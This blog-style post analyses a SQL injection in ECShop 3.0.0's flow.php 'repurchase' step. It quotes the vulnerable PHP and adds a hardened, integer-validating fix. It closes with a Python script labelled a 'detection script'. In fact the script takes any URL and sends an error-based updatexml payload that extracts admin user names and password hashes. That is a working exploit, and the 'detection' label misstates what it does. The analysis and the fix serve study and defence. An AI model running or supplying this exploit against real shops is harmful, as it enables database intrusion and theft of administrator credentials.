ECShop 3.0.0 injection
2016-09-07 12:04
148 views
I set up an environment to demonstrate this to someone, so here is a short analysis. The defect is in flow.php: in the `repurchase` step, the `order_id` value from the POST request is concatenated into the SQL query without single quotes (and without being cast to an integer), which results in SQL injection.
<?php
elseif ($_REQUEST['step'] == 'repurchase')
{
    include_once('includes/cls_json.php');

    $order_id = strip_tags($_POST['order_id']);
    $order_id = json_str_iconv($order_id);
    $user_id  = $_SESSION['user_id'];

    $json = new JSON;

    // order_id is concatenated unquoted and uncast: this is the injection point
    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
    if (!$order)
    {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        die($json->encode($result));
    }

    $db->query('DELETE FROM ' . $ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);

    // same unquoted order_id reaches a second query
    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);

    $result = array('error' => 0, 'message' => '');
    foreach ($order_goods as $goods)
    {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE))
        {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }
    die($json->encode($result));
}
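The fix a practitioner wants here is to accept `order_id` only as a canonical integer before it is ever placed in a query; `strip_tags()` and `json_str_iconv()` are not SQL sanitizers. The following is an added example of a hardened `repurchase` branch, written for this post and not ECShop's own patch; it assumes the flow.php globals `$db`, `$ecs`, `$_LANG` and `CART_REPURCHASE` seen above, and the helper `int_param_or_null()` is hypothetical.

```php
<?php
// Added example, not ECShop's own code. Helper: return $value as an int only if
// it is a canonical decimal integer string (rejects "1 or ...", "1.0", " 1").
function int_param_or_null($value)
{
    if (is_int($value)) {
        return $value;
    }
    if (is_string($value) && preg_match('/^-?[0-9]{1,18}$/', $value)) {
        return (int) $value;
    }
    return null;
}

// Body of: elseif ($_REQUEST['step'] == 'repurchase') { ... }
include_once('includes/cls_json.php');
$json = new JSON;

$order_id = int_param_or_null(isset($_POST['order_id']) ? $_POST['order_id'] : null);
$user_id  = int_param_or_null(isset($_SESSION['user_id']) ? $_SESSION['user_id'] : null);
if ($order_id === null || $user_id === null) {
    // Refuse the request; the raw string never reaches MySQL, so neither
    // the query nor a MySQL error message can be driven by the client.
    die($json->encode(array('error' => 1, 'message' => $_LANG['repurchase_fail'])));
}

$order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') .
    ' WHERE order_id = ' . $order_id . ' AND user_id = ' . $user_id);
if (!$order) {
    die($json->encode(array('error' => 1, 'message' => $_LANG['repurchase_fail'])));
}

$db->query('DELETE FROM ' . $ecs->table('cart') . ' WHERE rec_type = ' . (int) CART_REPURCHASE);

// $order_id is now a PHP int, so concatenation cannot change the query shape.
$order_goods = $db->getAll('SELECT goods_id, goods_number, goods_attr_id, parent_id FROM ' .
    $ecs->table('order_goods') . ' WHERE order_id = ' . $order_id);

$result = array('error' => 0, 'message' => '');
foreach ($order_goods as $goods) {
    $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
    if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
    }
}
die($json->encode($result));
```

The same integer check belongs on every other numeric parameter flow.php concatenates into SQL; a single missed parameter reopens the same class of bug.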
ECShop 3.0.0 injection detection script (I wrote this script out of boredom):
#coding:utf-8
#ecshop 3.0.0 flow.php sql injection
#author:jwong
import requests
import re
import sys


def get_md5(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0"
    }
    payload = {
        "order_id": "1 or updatexml(1,(select concat(0x3a,user_name,0x3a,password,0x3e) from ecs_admin_user),1)#"
    }
    urls = url + '/flow.php?step=repurchase'
    req = requests.post(urls, data=payload, headers=headers)
    print(req.text)
    if req.status_code == 200 and req:
        # the MySQL error text is only present when the query error is echoed back
        pattern = re.compile("XPATH syntax error: '(.*?)'")
        matches = re.findall(pattern, req.text)
        if not matches:
            print('no XPATH syntax error in response')
            return
        info = matches[0]
        new_list = info.split(':')
        password = new_list[-1]
        username = new_list[1]
        print(username + ':' + password)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('usage: python ecshop.py url')
        sys.exit()
    url = sys.argv[1]
    if 'http://' not in url:
        url = 'http://' + url
    get_md5(url)